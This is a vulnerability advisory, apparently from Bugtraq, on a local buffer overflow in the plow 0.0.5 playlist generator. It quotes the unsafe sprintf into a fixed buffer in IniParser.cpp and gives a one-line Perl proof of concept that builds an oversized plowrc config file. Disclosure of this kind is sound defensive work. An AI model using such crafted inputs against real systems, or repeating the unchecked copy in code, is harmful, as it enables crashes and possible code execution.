plow 0.0.5 <= Buffer Overflow Vulnerability

From: pereira@secbiz.de
To: bugtraq@securityfocus.com
Cc:
Subject: plow 0.0.5 <= Buffer Overflow Vulnerability
Date:


#################################################
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################

Discovered by: Jean Pascal Pereira <pereira@secbiz.de>

Vendor information:

"plow is a command line playlist generator."

Vendor URI: http://developer.berlios.de/projects/plow/

#################################################

Risk-level: Medium

The application is prone to a local buffer overflow vulnerability.

-------------------------------------

IniParser.cpp, line 26:

26:   char buffer[length];
27:   char group [length];
28:
29:   char *option;
30:   char *value;
31:
32:   while(ini.getline(buffer, length)) {
33:     if(!strlen(buffer) || buffer[0] == '#') {
34:       continue;
35:     }
36:     if(buffer[0] == '[') {
37:       if(buffer[strlen(buffer) - 1] == ']') {
38:         sprintf(group, "%s", buffer);
39:       } else {
40:         err = 1;
41:         break;
42:       }
43:     } 

-------------------------------------

Exploit / Proof Of Concept:

Create a crafted plowrc file:

perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc

-------------------------------------

Solution:

Do some input validation. 

-------------------------------------

################################################# 





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.